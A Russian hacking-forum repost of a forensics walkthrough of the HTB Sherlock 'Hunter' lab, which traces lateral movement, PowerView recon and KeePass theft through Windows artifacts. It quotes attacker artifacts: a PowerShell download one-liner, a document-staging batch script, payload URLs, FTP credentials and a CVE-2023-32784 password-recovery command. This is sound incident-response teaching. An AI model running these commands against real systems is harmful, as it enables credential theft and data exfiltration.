• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Уроки форензики. Расследуем кражу паролей KeePass на примере HTB Hunter

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 333
Сегодня в рамках расследования инцидента мы с тобой проэксплуатируем уязвимость в KeePass, найденную в 2023 году, а затем посмотрим, как использовать инструмент ZUI для анализа артефактов.

Нам предстоит пройти задание Hunter c ресурса Hack The Box Sherlocks. Его уровень сложности — «безумный». Мы не будем давать готовых ответов на вопросы в задании. Вместо этого сосредоточимся на процессе расследования, чтобы ты мог при желании повторить его сам и подсмотреть в эту статью, если вдруг зайдешь в тупик.

В описании к инциденту сказано:
Аналитик SOC получил предупреждение о возможных атаках lateral movement и credential stuffing. После анализа алерт был подтвержден. У сетевого сенсора были проблемы с производительностью, поэтому захвачен не весь трафик.
Для анализа даны:
  • дамп трафика;
  • архив с артефактами хоста, собранный утилитой KAPE.
В процессе анализа заполним карточку инцидента и составим Incident Response Plan (IRP) в IRIS.

СОБИРАЕМ ИНФОРМАЦИЮ О СИСТЕМЕ​

Для получения информации oб имени анализируемого хоста воспользуемся утилитой Hayabusa:
Код:
./hayabusa computer-metrics --rules-config ../config/ -d ~/C/
Утилита проанализирует события журналов Windows и предложит несколько вариантов, с частотой их упоминания:
  • Forela-Wkstn002.forela.local — 97 385 упоминаний;
  • DESKTOP-H72HB4B — 6861 упоминание;
  • Forela-Wkstn002 — 6087 упоминаний;
  • FORELA-WKSTN002 — 4 упоминания.
Можем предположить, что имя DESKTOP-H72HB4B было до ввода машины в домен.

Больше информации мы получим из реестра, для этого воспользуемся утилитой RegRipper3.0 и плагинами.

winver​

Ветка реестра:
Код:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Команда:
Код:
regripper -p winver -r CONFIG
Вывод:
Код:
ProductName               Windows 10 Pro N
ReleaseID                 2009
BuildLab                  19041.vb_release.191206-1406
BuildLabEx                19041.1.amd64fre.vb_release.191206-1406
CompositionEditionID      EnterpriseN
RegisteredOrganization
RegisteredOwner           CyberJungle
InstallDate               2023-03-07 13:14:17Z
InstallTime               2023-03-07 13:14:17Z

networklist​

Ветка реестра:
Код:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\ProfileName\
Команда:
Код:
regripper -p networklist -r CONFIG
Вывод:
Код:
Network 2
  Key LastWrite    : 2023-06-21 11:17:27Z
  DateLastConnected: 2023-06-21 16:17:27
  DateCreated      : 2023-04-12 21:20:50
  DefaultGatewayMac: 00-50-56-EE-C1-2F
  Type             : wired
forela.local
  Key LastWrite    : 2023-06-21 11:47:27Z
  DateLastConnected: 2023-06-21 16:47:27
  DateCreated      : 2023-03-08 03:25:47
  DefaultGatewayMac: 00-50-56-EB-C1-1A
  Type             : wired
Network
  Key LastWrite    : 2023-04-12 09:16:14Z
  DateLastConnected: 2023-04-12 14:16:14
  DateCreated      : 2023-03-07 17:51:47
  DefaultGatewayMac: 00-50-56-EB-C1-1A
  Type             : wired
Domain/IP forela.local

compname​

Ветка реестра:
Код:
HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\
Команда:
Код:
regripper -p compname -r SYSTEM
Вывод:
Код:
ComputerName    = forela-wkstn002
TCP/IP Hostname = Forela-Wkstn002

ips​

Ветка реестра:
Код:
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Команда:
Код:
IPAddress 172.17.79.131
Результаты:
  • домен — forela.local;
  • хост — forela-wkstn002;
  • IP — 172.17.79.131.
Добавляем все найденное в IRIS.
iris-add-asset.png


АНАЛИЗИРУЕМ ФАЙЛ PCAP​

Анализ артефактов хоста, безусловно, дает огромное количество информации о произошедших событиях, но я начал с просмотра трафика, чтобы понять, какие взаимодействия были с анализируемой машиной.

Для анализа PCAP-файла я использовал ZUI и Wireshark.

Начнем с алертов сигнатур опенсорсной IDS Suricata.
Алерты Suricata

В глаза бросается использование Kali Linux, о чем говорит вот эта сигнатура:
Код:
ET POLICY Possible Kali Linux hostname in DHCP Request Packet
Найдем информацию об использовании DCHP:
Код:
_path=="dhcp" | select ts, client_addr, server_addr, mac, host_name, client_fqdn, domain, assigned_addr
В 11:31:18 21 июня 2023 года хосту kali назначен IP 172.17.79.133. Добавим это в таймлайн IRIS.
Использование DHCP

Также мы видим, что в широковещательном домене есть следующие хосты:
  • 172.17.79.131 — Forela-Wkstn002.forela.local (анализируемый нами хост);
  • 172.17.79.132 — DESKTOP-887GK2L.
Посмотрим, с кем взаимодействовал Forela-Wkstn002.forela.local (172.17.79.131). Для начала сделаем сортировку по тегам.

Статистика по тегам


FTP​

Посмотрим тег ftp:
Код:
fuse | 172.17.79.131 | _path=="ftp" | sort -r ts
Увидим сетевые взаимодействия с FTP-сервером 13.235.18.128.

Давай подробнее посмотрим в Wireshark:
Код:
ftp || ftp-data
Обнаружим авторизацию на FTP-сервере.
Авторизация по протоколу FTP


Посмотрим, какие файлы эксфильтровал злоумышленник, и сохраним их.
Эксфильтрованные файлы

Время сетевого взаимодействия: 12:20:16.012196 — 12:23:04.994762. Набор файлов keepassproc.zip и Database.kdbx указывает на то, что хакер мог извлечь пароли из базы данных, используя уязвимость CVE-2023-32784.


SMB​

Посмотрим сетевые соединения тeг conn:
Код:
fuse | 172.17.79.131 | _path=="conn"
События с тегом conn


Мы видим сессии от kali (172.17.79.133) к Forela-Wkstn002.forela.local (172.17.79.131) по 445-му порту (SMB). Эта сессия не была отнесена анализатором к SMB (вспоминаем, что захвачен был не весь сетевой трафик). Перейдем в Wireshark.

SMB-сессии

Сессия связана с Kali, можем предположить, что используется утилита impacket-psexec.

Время сетевого взаимодействия: 11:25:09.263058 — 11:33:35.584495.

RDP​

Продолжим анализ сетевых сессий и проверим наличие RDP:
Код:
fuse | 172.17.79.131 | _path=="conn" | cut ts,id | 3389
RDP-сессии

Посмотрим в Wireshark:
Код:
tcp.port==3389
RDP-сессии

Время сетевого взаимодействия: 12:18:35.508604 — 12:23:34.962134

Добавим информацию о IoC.
Информация о IoC


И о событиях.

Таймлайн инцидента

В результате анализа трафика мы узнали, что злоумышленнику удалось скомпрометировать учетные данные для хоста Forela-Wkstn002.forela.local, эксфильтровать дамп процесса и базу данных KeePass, а также архив с проектом.


АНАЛИЗИРУЕМ ЖУРНАЛЫ СОБЫТИЙ WINDOWS​

Начнем анализ артефактов Windows, для чего снова пустим в ход Hayabusa.

Посмотрим сводку по авторизациям:
Код:
./hayabusa logon-summary -d ~/Hunter_Acquisition/Acquisition/2023-06-22T092426_Acquisition/C/
Сводка по авторизациям

Можем подтвердить, что с хоста 172.17.79.133 (Kali) было подключение по RDP.

Запустим анализ событий правилами Sigma и hayabusa-rules:
Код:
./hayabusa csv-timeline -d ~/C/ --output ~/hayabusa_last.csv --UTC
Сводка по правилам

Сразу в глаза бросаются алерты:
  • Defender Alert;
  • PowerView PowerShell Cmdlets — ScriptBlock.
Дальше работать с результатами Hayabusa будем в ZUI.

Давай поищем авторизации с Kali:
Код:
EventID==4624. | 172.17.79.133
Авторизации с Kali

Наши предположения об авторизациях подтвердились.

PsExec​

Отфильтруем события по Logon ID 0x26fbee и увидим последовательность событий, похожую на работу PsExec. Далее поищем события, связанные с созданием служб в нужный нам интервал времени: EventID==7045. | "2023-06-21"

Обнаружение PsExec

К индикаторам можем отнести название исполняемого файла и имя службы:
  • служба: tFdj;
  • путь к исполняемому файлу: %systemroot%\\owUjOMCY.exe;
  • время: 2023-06-21T11:19:34.
Детектируем горизонтальное перемещение с SMBExec и AtExec (Хабрахабр)

К сожалению, событий создания или завершения процесса в нашем интервале нет.
Отсутствие событий создания или завершения процессов

Давай отсортируем по типам правил:
Код:
"06-21" | count() by RuleTitle | sort -r count
И точечно посмотрим на некоторые.

Meterpreter​

Код:
"06-21" | RuleTitle=="Antivirus Hacktool Detection"
Событие с EventId=1116 из журнала Microsoft-Windows-Windows Defender/Operational:
Код:
Threat: Trojan:Win64/Meterpreter.E ¦ Severity: Severe ¦ Type: Trojan ¦ User: NT AUTHORITY\SYSTEM ¦ Path: file:_C:\Users\alonzo.spire\notepad.exe; shellopencmd:_HKLM\SOFTWARE\CLASSES\txtfile\shell\open\command\\ ¦ Proc: Unknown
Оно сигнализирует нам о том, что файл C:\Users\alonzo.spire\notepad.exe определен как Trojan:Win64/Meterpreter.E. и пытался закрепиться или закрепился, используя следующую ветку реестра:
Код:
HKLM\SOFTWARE\CLASSES\txtfile\shell\open\command\\
Время обнаружения: 2023-06-21 12:33:55.002.

Загружаем PowerView​

Посмотрим события, связанные с работой PowerShell.
Код:
"06-21" | PwSh | Details!="HostApplication: n/a"
В результате получим много событий EventId=4104 и одно событие EventId=400.

Событие ниже свидетельствует о загрузке злоумышленником утилиты PowerView, предназначенной для постэксплуатации в средах Active Directory. Утилита сохранена с именем clean.ps1.

Время регистрации события — 2023-06-21 11:30:40.755.
Код:
Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.19041.2673 HostId=b9505ee1-faf5-41b3-af08-7dddad696ee3 HostApplication=powershell -c (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'clean.ps1') EngineVersion=5.1.19041.2673 RunspaceId=248a767b-db92-435f-bda4-5e42213ebf64 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None
События 4104 регистрируют куски кода PowerView, которые используют подозрительные функции.

RDP​

Давай уточним время работы хакера по RDP. Для этого еще раз обратимся к событиям авторизации и к журналам:
  • Terminal-Services-RemoteConnectionManager/Operational;
  • TerminalServices-LocalSessionManager/Operational.
Код:
"06-21" | 4624. or "RDS-"
Авторизации RDP

Можем предположить, что RDP-сессия длилась с 2023-06-21 11:44:51.426 по 2023-06-21 12:53:45.809.
На этом интересные события закончились, не забудем внести информацию в IRIS.

АРТЕФАКТЫ ВЫПОЛНЕНИЯ ПРОЦЕССОВ​

SRUM​

Начнем со SRUM (Windows System Resource Usage Monitor), так как в нашем инциденте много сетевых взаимодействий.

Получим информацию из SRUM в виде JSON с помощью тулзы сhainsaw.
Код:
./chainsaw analyse srum -s ./2023-06-22T092426_Acquisition/C/Windows/System32/config/SOFTWARE ./2023-06-22T092426_Acquisition/C/Windows/System32/SRU/SRUDB.dat -o ./srum_chainsaw.json
В результате имеем вывод, как на скриншоте ниже.

Вывод работы chainsaw

Загрузим полученный файл в ZUI и начнем анализ с таблицы Windows Network Data Usage Monitor.
Код:
over this | TableName=="Windows Network Data Usage Monitor" | fuse | cut TimeStamp, UserName, AppName, AppId, BytesRecvd, BytesSent | sort -r TimeStamp
Код:
2023-06-21T12:53:00Z
\device\harddiskvolume3\program files\filezilla ftp client\filezilla.exe
FileZilla, сетевое взаимодействие из SRUM

Код:
2023-06-21T12:53:00Z
\device\harddiskvolume3\windows\system32\certutil.exe
Certutil, сетевое взаимодействие из SRUM

Код:
2023-06-21T12:17:00Z
\device\harddiskvolume3\windows\system32\windowspowershell\v1.0\powershell.exe
PowerShell, сетевое взаимодействие из SRUM

Код:
2023-06-21T12:17:00Z
\device\harddiskvolume3\windows\system32\certutil.exe
Certutil, сетевое взаимодействие из SRUM

Код:
2023-06-21T12:17:00Z
\device\harddiskvolume3\program files\process hacker 2\processhacker.exe
Process Hacker, сетевое взаимодействие SRUM

Можем предположить, что данные украли с использованием FileZilla, а дамп процесса KeePass сделали через Process Hacker. Новым обстоятельством для нас становится использование тулзы certutil, которая позволяет загружать файлы.

Давай посмотрим информацию в таблице App Timeline Provider. После выполнения PsExec злоумышленник получает доступ в контексте учетной записи NT AUTHORITY\System. Следующий запрос поможет нам понять, какие процессы запускал хакер.
Код:
over this | "06-21" | TableName=="Application Resource Usage Provider" or TableName=="App Timeline Provider" | fuse | cut TimeStamp,EndTime, DurationMS, UserName, AppName, TableName | sort -r EndTime | UserName=="systemprofile"
Процессы пользователя SYSTEM

Можем предположить, что были выполнены команды net1.exe, net.exe и PowerShell. Запуск PowerShell совпадает со временем регистрации загрузки PowerView.

Какие процессы были связаны с пользователем alonzo.spire?
Код:
over this | "06-21" | TableName=="Application Resource Usage Provider" or TableName=="App Timeline Provider" | fuse | cut TimeStamp,EndTime, DurationMS, UserName, AppName, TableName | sort -r EndTime | UserName=="alonzo.spire"
srum-1.png
srum-2.png
srum-3.png
Процессы из SRUM для пользователя alonzo.spire


Из SRUM мы узнали, что пользователь alonzo.spire создавал такие процессы:
  • keepass;
  • filezilla;
  • powershell;
  • powershell_ise;
  • WinRAR;
  • RAR;
  • ProcessHacker.

Prefetch​

Давай заглянем в Prefetch-файлы, они содержат время последних восьми запусков процесса и информацию о файлах, с которыми процесс взаимодействовал.

Файлы Prefetch расположены в C:\Windows\prefetch\. Парсим их скриптом и закидываем в ZUI. Начнем анализ с данных, которые у нас уже есть.

Сессия PsExec​

Служба PsExec — owujomcy.exe (over this | sort -r last_exec_time).

Команды PsExec

На скриншоте выше представлены процессы, предположительно связанные с сессией PsExec: owujomcy.exe, cmd.exe, whoami.exe, certuril.exe, powershell.exe, net.exe, net1.exe. Похоже на стандартный набор команд, выполняемых при компрометации машины.

Опытный читатель знает, что в Prefetch хранится информация о взаимодействии процесса с другими файлами в первые десять секунд его работы. Как мы видим из скриншота выше, времени между командами прошло гораздо больше.

В файлах и директориях, связанных с процессом certutil.exe, аномалий не нашлось, поэтому можем убрать его из цепочки процессов выше.

Время запуска процессов:
  • WHOAMI.EXE — 2023-06-21T11:19:59.915253;
  • POWERSHELL.EXE — 2023-06-21T11:30:39.567358 (совпадает со временем загрузки PowerView, но в связях отсутствует файл clean.ps1);
  • NET1.EXE — 2023-06-21T11:33:20.404245;
  • NET.EXE — 2023-06-21T11:33:20.326231.

RDP-сессия​

Давай посмотрим процессы, которые предположительно относятся к RDP-сессии.

Процессы из RDP-сессии

Сравниваем с результатами, полученными из SRUM. Ничего нового не появилось, но давай глянем еще данные о прошлых запусках и о связанных файлах.

Время запусков powershell.exe:
  • 2023-06-21T11:51:01.844703;
  • 2023-06-21T11:20:59.195584;
  • 2023-06-21T11:20:28.235246;
  • 2023-06-21T11:20:21.166621;
  • 2023-06-21T11:19:56.205089;
  • 2023-06-21T11:19:49.169370;
  • 2023-06-21T11:19:30.172513;
  • 2023-06-21T11:19:11.784861.
Время запусков FILEZILLA.EXE:
  • 2023-06-21T11:59:54.640629;
  • 2023-06-21T11:59:46.703003.
В связанных файлах ничто не указывает на эксфильтрацию, но мы помним про первые десять секунд.

Процесс RAR.exe предоставил достаточно новой информации: RAR.EXE — 2023-06-21T12:13:15.784399.

Файлы, связанные с процессом RAR.exe
Файлы, связанные с процессом RAR.exe

На скриншотах выше мы видим, что хакер создал директорию Exfil и копировал туда файлы.

Процесс winrar.exe:
  • 2023-06-21T12:18:04.408710;
  • 2023-06-21T12:07:55.183899.
Файлы, связанные с процессом winrar.exe


Процесс certutil.exe:
  • 2023-06-21T12:29:49.237697;
  • 2023-06-21T12:29:42.612611;
  • 2023-06-21T12:12:35.575593.
В связях нашлось кое‑что интересное.

Файлы, связанные с процессом certutil.exe

Из общей картины в глаза бросаются файлы вот в этом пользовательском каталоге:
Код:
\VOLUME{01d951602330db46-52233816}\USERS\ALONZO.SPIRE\

Вот их полный список:
Код:
APPDATA\LOCALLOW\MICROSOFT\CRYPTNETURLCACHE\METADATA\3DC3856568F41DEBDC478970629B1FC6
APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\4TSWMJTT\NOTEPAD[1].EXE
NOTEPAD.EXE
APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\TFR2JWYD\NOTEPAD[1].EXE
APPDATA\LOCALLOW\MICROSOFT\CRYPTNETURLCACHE\METADATA\A3CEB2B928510B461A9B19D9B4B8D5B6
APPDATA\LOCALLOW\MICROSOFT\CRYPTNETURLCACHE\CONTENT\A3CEB2B928510B461A9B19D9B4B8D5B6
APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\OOI66Y9I\SCOUT[1].BAT
PICTURES\SCOUT.BAT
Поиск строки user-agent с упоминанием certutil в трафике не дал результатов, скорее всего, из‑за того, что дамп неполный.

Нам предстоит узнать содержимое файла scout.bat и notepad.exe.

Shimcache и Amcache​

Продолжим анализ артефактов, указывающих на запуск или наличие файлов процессов Shimcache и Amcache. Для их анализа будем использовать chainsaw и ZUI.

При анализе Shimcache стоит помнить, что в нем могут храниться файлы, которые не запускались, а были отображены в проводнике Windows (explorer.exe).
Данные из Shimcache

Ничего нового мы не обнаружили, за исключением времени последнего изменения файла: C:\Users\alonzo.spire\notepad.exe запускался в 2023-06-21T12:29:49.597Z.

Перейдем к Amcache. Для его анализа воспользуемся утилитой RegRipper.
Код:
regripper -r /data/Amcache.hve -p amcache
В Amcache удалось найти хеш SHA-1 файла службы PsExec:
Код:
2023-06-21T11:33:14.594430700Z
c:\windows\owujomcy.exe 23873bf2670cf64c2440058130548d4e4da412dd
VirusTotal PsExec


АРТЕФАКТЫ ФАЙЛОВОЙ И ОПЕРАЦИОННОЙ СИСТЕМЫ​

$MFT​

Спарсим C:\$MFT утилитой MFT и загрузим данные в ZUI.

Найдем, где были сохранены файлы clean.ps1 и Scout.bat.

Расположение clean.ps1
Расположение Scout.bat

Посмотрим, есть ли информация о файлах, которые хакер эксфильтровал:
Код:
fuse | keepassproc.zip or Database.kdbx or redacted
Информация об эксфильтрованных файлах
Время создания дампа процесса KeePass

Из скриншота выше мы узнаем, что дамп процесса KeePass был сделан в 2023-06-21T12:06:42.281943Z.

Windows Search Database​

В качестве последнего артефакта ОС рассмотрим Windows Search Database. Для его анализа воспользуемся утилитой sidr.
Код:
./sidr ~./2023-06-22T092426_Acquisition/C/ -f json -o ~/sidr/
В результате мы получили три файла:
  • File_Report_20240503_120219.452284.json;
  • Internet_History_Report_20240503_120219.452528.json;
  • Activity_History_Report_20240503_120219.452589.json.
Нас интересует первый файл, давай загрузим его в ZUI.

Посмотрим, какие расширения файлов есть в базе:
Код:
fuse | "06-21" | count() by System_ItemType | sort -r count
Расширения файлов в Windows Search Database

Наибольший интерес для нас представляет информация о .bat:
Код:
fuse | "06-21" | System_ItemType==".bat
Информация о файле Scout.bat

В последнем столбце — часть содержимого batch-файла. Скрипт ниже представлен не полностью, поскольку остальные строки в нем закомментированы.
Код:
set "source=%userprofile%"
set "destination=%temp%\Exfil"
if not exist "%destination%" mkdir "%destination%"
for /r "%source%" %%a in (*.docx *.docm *.pdf *.xls *.txt *.ppt *.xlsx *.pptx) do (
    copy "%%a" "%destination%"
)
cd %TEMP%\Exfil
"C:\Program Files\WinRAR\Rar.exe" a Exfil
Вот что делает скрипт:
  • устанавливаются переменные source и destination;
  • если директория %temp%\Exfil отсутствует, она создается;
  • копируются файлы, подходящие под маску;
  • создается архив %TEMP%\Exfil\Exfil.rar.

АРТЕФАКТЫ ИСПОЛЬЗУЕМЫХ ПРИЛОЖЕНИЙ И УТИЛИТ​

FileZilla​

В директории можем посмотреть конфиг FileZilla.

C:\Users\alonzo.spire\AppData\Roaming\FileZilla\recentservers.xml​

XML:
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.63.2.1" platform="windows">
    <RecentServers>
        <Server>
            <Host>13.235.18.128</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <User>theyoungwolf</User>
            <Pass encoding="base64">VGhlTG9uZ05pZ2h0SXNDb21pbmc=</Pass>
            <Logontype>1</Logontype>
            <PasvMode>MODE_DEFAULT</PasvMode>
            <EncodingType>Auto</EncodingType>
            <BypassProxy>0</BypassProxy>
        </Server>
        <Server>
            <Host>ypmlads.ftp.fileserver</Host>
            <Port>4825</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <User>cyberjunkie</User>
            <Pass encoding="base64">VWlvbnNrSEdUTERT</Pass>
            <Logontype>1</Logontype>
            <PasvMode>MODE_DEFAULT</PasvMode>
            <EncodingType>Auto</EncodingType>
            <BypassProxy>0</BypassProxy>
        </Server>
        <Server>
            <Host>13.45.67.23</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <Type>0</Type>
            <User>alonzo.spire</User>
            <Pass encoding="base64">VGhlQXdlc29tZUdyYXBl</Pass>
            <Logontype>1</Logontype>
            <PasvMode>MODE_DEFAULT</PasvMode>
            <EncodingType>Auto</EncodingType>
            <BypassProxy>0</BypassProxy>
        </Server>
    </RecentServers>
</FileZilla3>
Изучив этот файл, можем предположить, что хакер пытался подключиться к нескольким FTP-серверам. Добавим их в IoC.

Certutil​

Кеш утилиты certutil (yet) находится в этой директории:
Код:
C:\Users\alonzo.spire\AppData\LocalLow\Microsoft\CryptnetUrlCache
Содержимое Scout.bat:
Код:
C:\Users\alonzo.spire\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A3CEB2B928510B461A9B19D9B4B8D5B6
URL для загрузки Scout.bat:
Код:
hxxp://oakfurnitures.uk/ovxlabd/campaign/uk_orgs/Scout.bat
Найти этот URL можно здесь:
Код:
C:\Users\alonzo.spire\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A3CEB2B928510B461A9B19D9B4B8D5B6
URL для загрузки notepad.exe:
Код:
hxxp://oakfurnitures.uk/ovxlabd/campaign/uk_orgs/notepad.exe
Находится в этом файле:
Код:
C:\Users\alonzo.spire\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\cat 3DC3856568F41DEBDC478970629B1FC6

История PowerShell​

Историю команд, выполняемых в консоли PowerShell, можем найти в следующем файле:
Код:
C:\Users\alonzo.spire\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Его содержимое представлено ниже. Выполняются команды из PowerView.
Код:
powershell -ep bypass
. .\clean.ps1
Get-NetDomainController
Get-NetDomainUsers
Get-NetUsers
Get-NetUser

KeePass CVE-2023-32784​

Настало время разобраться с дампом процесса KeePass и с украденной базой паролей. Для эксплуатации уязвимости я воспользовался скриптом с GitHub. Дамп хранится в архиве с паролем, и могу сказать, что наш хакер не очень любит использовать разные пароли.

Для использования скрипта введем команду
Код:
python3 keepass_dump.py -f ~/Downloads/Hunter_Acquisition/keepassproc.dmp --recover
В результате получим восстановленный пароль от KDBX, в котором хранятся учетные данные администратора домена Active Directory.

ВЫВОДЫ​

В процессе расследования мы вспомнили, где искать некоторые артефакты Windows, файловой системы NTFS и утилит, которыми могут пользоваться хакеры.

Мы воссоздали таймлайн инцидента в IRP. Ниже — получившаяся полная картина.

Таймлайн инцидента


В заключение хочу посоветовать аналитикам внимательно подходить к изучению артефактов и собирать инструментарий на все случаи жизни.

Автор @d3f0x0
Источник xakep.ru
 
Отличная статья. @d3f0x0 красавчик. Жаль что форензика представлена на форуме кране ограниченно (да я понимаю что не та направленность). Однако, чтобы делать хорошие копья, надо понимать какие щиты сейчас делают в противоположном лагере.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх